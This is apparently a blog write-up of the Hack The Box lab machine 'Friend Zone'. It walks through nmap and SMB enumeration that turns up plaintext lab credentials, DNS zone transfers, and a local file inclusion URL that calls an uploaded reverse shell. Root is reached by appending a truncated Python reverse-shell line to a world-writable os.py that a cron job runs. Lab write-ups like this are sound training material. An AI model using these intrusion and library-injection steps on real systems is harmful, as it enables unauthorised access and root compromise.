• Donald Ashdown

HTB Friend Zone


Overview


This machine forces you to think about DNS servers and name lookups critically.

It starts off with the typical unsecured SMB shares where credentials are found, but then takes a twist requiring the user to enumerate subdomains and DNS records. After uncovering sub domains you are required to visit many sites over HTTP and HTTPS. Eventually finding a login page that has a local file inclusion vulnerability. This means we can upload a file to the webserver and call it through the url with a ? query and appending the statement. This calls our script and executes a bac kdoor.


A cron job running is executing an important python script every 2 minutes that reveals the OS module is being imported as apart of the script. We are able to inject code into the OS module as the permissions are not configured properly. From here we execute code for a back door.


Summary

  • Insecure SMB shares reveal password

  • Subdomain enumeration provides a new target

  • DNS enumeration provides a new subdomain of the subdomain.

  • This domain on the dash board page has an LFI vulnerability

  • A python script executing as root has 777 permissions and we can inject code and wait for root to execute.

Tools/Blogs used


  • smbclient

  • dig

Lessons Learned


This machine was fairly pain free. I enjoyed the python library injection.


Enumeration


[]$ nmap 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:32 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
53/tcp   open     domain
80/tcp   open     http
139/tcp  open     netbios-ssn
443/tcp  open     https
445/tcp  open     microsoft-ds
2920/tcp filtered roboeda

Nmap done: 1 IP address (1 host up) scanned in 23.08 seconds

Enumeration detailed

Standard nmap scan but with the addition of -sC and -sV to use default scripts and check versions.



 nmap -sC -sV 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:26 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m40s, deviation: 1h09m16s, median: 19s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2020-11-30T15:26:58+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-30T13:26:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.54 seconds




SMB Enumeration - Port 445 / 139


smbclient -L 10.10.10.123
Enter WORKGROUP\htb-bluedolphin's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	Files           Disk      FriendZone Samba Server Files /etc/Files
	general         Disk      FriendZone Samba Server Files
	Development     Disk      FriendZone Samba Server Files
	IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Well I tried smbmap to quickly check the permissions but it has not been working, so I will have to dive in and check each file share individually. But before we do this I performed a little research to help automate my ongoing process and found the nmap scripting engine has an SMB enumeration nse script that can be successfully called.


nmap --script smb-enum-shares.nse 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:44 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 70.00 seconds

We can see that the dev and general share are open for business. The development share had nothing of use, but the general share had plain text credentials.


General Share


smbclient //10.10.10.123/general
Enter WORKGROUP\htb-bluedolphin's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 20:10:51 2019
  ..                                  D        0  Wed Jan 23 21:51:02 2019
  creds.txt                           N       57  Tue Oct  9 23:52:42 2018

		9221460 blocks of size 1024. 6460344 blocks available
smb: \> get creds.txt 
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> 

cat creds.txt 
creds for the admin THING:

admin:WORKWORKHhallelujah@#



HTTP Enumeration - Port 80



This smells like sub domain enumeration.

Browsing to friendzoneportal.red redirects us to the /?z directory. Firing up burb suite to intercept the request just redirects us to the main page again.


Testing the HTTPS page provides us with a different landing page.



A look into the DNS logs using dig showed us a couple subdomains.



dig axfr friendzoneportal.red @10.10.10.123

; <<>> DiG 9.16.2-Debian <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.	604800	IN	AAAA	::1
friendzoneportal.red.	604800	IN	NS	localhost.
friendzoneportal.red.	604800	IN	A	127.0.0.1
admin.friendzoneportal.red. 604800 IN	A	127.0.0.1
files.friendzoneportal.red. 604800 IN	A	127.0.0.1
imports.friendzoneportal.red. 604800 IN	A	127.0.0.1
vpn.friendzoneportal.red. 604800 IN	A	127.0.0.1
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Nov 30 15:42:41 UTC 2020
;; XFR size: 9 records (messages 1, bytes 309)


The above subdomains are to be added to the etc/hosts list, and mapped to the servers ip address. This allows our device to make a formal A record request to the DNS which can map it to the appropriate IP.



Logging in with those credentials we found in the smb general share we are brought to a page that simply suggests we look elsewhere.



Back to the drawing board


It was here that taking a step back was much needed. Another attempt at the sub domain enumeration turned over friendzone.red, so a dns dig provided some juicy information.


└──╼ []$ dig axfr friendzone.red @10.10.10.123

; <<>> DiG 9.16.2-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Sat Dec 05 18:29:32 UTC 2020
;; XFR size: 8 records (messages 1, bytes 289)


Adding administrator1.friendzon.red to /etc/hosts provided us access to the admin login page. But only after going over https. Initially http was providing a broken page. This was a bit of a red hearing.


This successfully brought us to the admin login page, where the credentials from the insecure SMB share have provided access.







The login page redirects us to dashboard.php


This took some time to figure out but if we query the host for the suggested image parameter we get what we want. Just the like webpage suggested "please enter to show the image".



So we uploaded a shell through the smb protocol to the Development directory.

From there we called our reverse shell by appending the URL with a LDI to ../../../etc/Development. We called the shell with the previously defined syntax and received a backdoor.


https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell


We get the flag from here, easy peasy :)


Privilege Escalation


After some initial enumeration I did not find much. Eventually I ran pspy and noticed a script being called every few minutes.



Investigating this script provided us with the following file contents.



#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

It was suggested that at this point we have to spend time enumerating and researching the script. Eventually I researched the python module 'OS' and came across research regarding exploitation.


I found some information but nothing overly helpful, but I learned the os.py file has open permissions.



friend@FriendZone:/opt/server_admin$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py
friend@FriendZone:/opt/server_admin$ 

So this means we can inject code into the library and then when the script is called, it will call the library with "import os" which will call and execute our script.


Initially I tried to inject code to cat the root flag into the temp folder and had no luck. I was not familiar enough with the syntax to troubleshoot the issue in a timely manner. So I decided to move into an area I was more syntactically familiar.


I proceeded to attempt reverse shell injections and had some issues but eventually settled on the python reverse shell with IPV4 syntax. I had to actually remote the python -c and the double quotes to get this to work. You can see the screen shot below:


This was pasted at the end of the os module.


import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s$





23 views0 comments